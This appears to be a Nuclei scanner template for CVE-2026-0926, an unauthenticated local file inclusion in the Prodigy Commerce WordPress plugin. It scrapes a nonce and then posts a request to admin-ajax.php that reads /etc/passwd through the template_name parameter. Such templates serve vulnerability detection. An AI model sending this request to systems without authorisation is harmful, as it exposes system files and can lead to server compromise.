id: CVE-2026-0926 info: name: Prodigy Commerce <= 3.3.0 - Local File Inclusion author: Shivam Kamboj severity: critical description: | Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely. impact: | Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data, potentially leading to full server compromise. remediation: | Update to the latest version beyond 3.2.9. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/prodigy-commerce/prodigy-commerce-329-unauthenticated-local-file-inclusion-via-parameterstemplate-name - https://nvd.nist.gov/vuln/detail/CVE-2026-0926 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-0926 epss-score: 0.29091 epss-percentile: 0.96671 cwe-id: CWE-98 metadata: max-request: 2 verified: true tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,prodigy-commerce,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" extractors: - type: regex name: nonce part: body group: 1 regex: - 'var settings\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-f0-9]+)"' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=prodigy-render-my-account-widget&nonce={{nonce}}¶meters[template_name]=etc/passwd¶meters[default_path]=/ matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100b43eb15954d6ef43bf38f11716997b5e442e9b637c4fc078316eb1118021041d02207bd5a6d3481cff76ad34c961607db6acf8453ed8a07f9ca8acece96fc507f86b:922c64590222798bb761d5b6d8e72950